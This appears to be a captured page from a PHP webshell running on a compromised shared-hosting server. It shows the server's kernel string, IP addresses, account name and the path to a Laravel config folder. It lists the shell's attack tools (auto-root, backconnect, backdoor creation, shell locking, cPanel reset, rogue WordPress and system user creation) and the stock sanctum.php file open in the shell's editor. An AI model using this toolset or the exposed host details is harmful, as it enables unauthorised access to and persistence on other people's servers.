Linux p3plzcpnl507038.prod.phx3.secureserver.net 4.18.0-553.141.2.lve.el8.x86_64 #1 SMP Wed Jul 8 16:10:02 UTC 2026 x86_64
Apache
: 107.180.60.7 | : 216.73.217.35
Cant Read [ /etc/named.conf ]
8.2.33
xq1lly2rxbs0
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
xq1lly2rxbs0 /
public_html /
config /
[ HOME SHELL ]
Name
Size
Permission
Action
app.php
20.68
KB
-rw-r--r--
app.php31-08-2026
20.68
KB
-rw-r--r--
auth.php
3.96
KB
-rw-r--r--
broadcasting.php
1.82
KB
-rw-r--r--
cache.php
3.2
KB
-rw-r--r--
cors.php
846
B
-rw-r--r--
database.php
5.17
KB
-rw-r--r--
error_log
488
B
-rw-r--r--
filesystems.php
2.31
KB
-rw-r--r--
hashing.php
1.54
KB
-rw-r--r--
logging.php
3.66
KB
-rw-r--r--
mail.php
3.52
KB
-rw-r--r--
permission.php
4.14
KB
-rw-r--r--
querydetector.php
2.4
KB
-rw-r--r--
queue.php
2.84
KB
-rw-r--r--
sanctum.php
2.24
KB
-rw-r--r--
services.php
1.07
KB
-rw-r--r--
session.php
6.86
KB
-rw-r--r--
view.php
1.03
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : sanctum.php
<?php use Laravel\Sanctum\Sanctum; return [ /* |-------------------------------------------------------------------------- | Stateful Domains |-------------------------------------------------------------------------- | | Requests from the following domains / hosts will receive stateful API | authentication cookies. Typically, these should include your local | and production domains which access your API via a frontend SPA. | */ 'stateful' => explode(',', env('SANCTUM_STATEFUL_DOMAINS', sprintf( '%s%s', 'localhost,localhost:3000,127.0.0.1,127.0.0.1:8000,::1', Sanctum::currentApplicationUrlWithPort() ))), /* |-------------------------------------------------------------------------- | Sanctum Guards |-------------------------------------------------------------------------- | | This array contains the authentication guards that will be checked when | Sanctum is trying to authenticate a request. If none of these guards | are able to authenticate the request, Sanctum will use the bearer | token that's present on an incoming request for authentication. | */ 'guard' => ['web'], /* |-------------------------------------------------------------------------- | Expiration Minutes |-------------------------------------------------------------------------- | | This value controls the number of minutes until an issued token will be | considered expired. If this value is null, personal access tokens do | not expire. This won't tweak the lifetime of first-party sessions. | */ 'expiration' => null, /* |-------------------------------------------------------------------------- | Sanctum Middleware |-------------------------------------------------------------------------- | | When authenticating your first-party SPA with Sanctum you may need to | customize some of the middleware Sanctum uses while processing the | request. You may change the middleware listed below as required. | */ 'middleware' => [ 'verify_csrf_token' => App\Http\Middleware\VerifyCsrfToken::class, 'encrypt_cookies' => App\Http\Middleware\EncryptCookies::class, ], ];
Close